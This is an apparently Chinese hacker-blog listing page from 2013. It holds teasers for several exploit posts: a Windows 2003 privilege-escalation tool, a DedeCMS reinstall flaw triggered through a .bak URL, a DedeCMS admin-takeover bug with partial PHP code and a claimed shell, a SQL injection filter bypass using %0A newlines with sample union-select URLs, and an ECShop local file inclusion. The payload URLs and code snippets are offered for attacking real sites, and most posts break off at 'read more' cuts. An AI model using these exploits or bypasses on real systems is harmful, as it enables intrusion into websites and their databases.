刚刚捞到的提权0DAY,亲测2K3成功.

分类:工具 | 2013-06-30 | 撸过 2,081 次
7人扯谈

不多说 上图:

windows 提权0day

windows 提权0day[......]

继续阅读

dedecms 躺着也中枪 爆重装漏洞

分类:安全 | 2013-06-30 | 撸过 2,045 次
4人扯谈

利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.

http://webshell.cc/install/index.php.bak?insLockfile=1

dedecms死的太冤枉了. apache的原因.

dedecms最新版本修改任意管理员漏洞 附getshell exp

分类:安全 | 2013-06-30 | 撸过 1,241 次
2人扯谈

此漏洞无视gpc转义,过80sec注入防御。

补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?

起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。

include/dedesql.class.php:

if(isset($GLOBALS['arrs1']))
{
    $v1 = $v2 = '';
    for($i=0;isset($arrs1[$i]);$i++)
    {
        $v1 .= chr($arrs1[$i]);
    }
    for([......]

继续阅读

GET参数SQL注入%0A换行污染绕过

分类:安全 | 2013-06-30 | 撸过 1,114 次
2人扯谈

绕过描述:

在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。

 

测试方法:

请求测试url:http://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4  — 被拦截

 

请求测试url:https://www.webshell.cc/1.php?id=-9%0Aunion%0Aselect 1,2,3,4   —- 绕过

ECShop网店系统最新版本地包含漏洞

分类:安全 | 2013-06-30 | 撸过 655 次
0人扯谈

      这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。

漏洞文件在:/demo/index.php

if (!empty($_POST['lang'])) //如果不为空
{
$lang_charset = explode('_', $_POST['lang']); //_分割
$updater_lang = $lang_charset[0].'_'.$lang_charset[1];
$ec_charset = $lang_charset[2]; //我们要控制的。
}
.
.
.
/* 加载升级[......]

继续阅读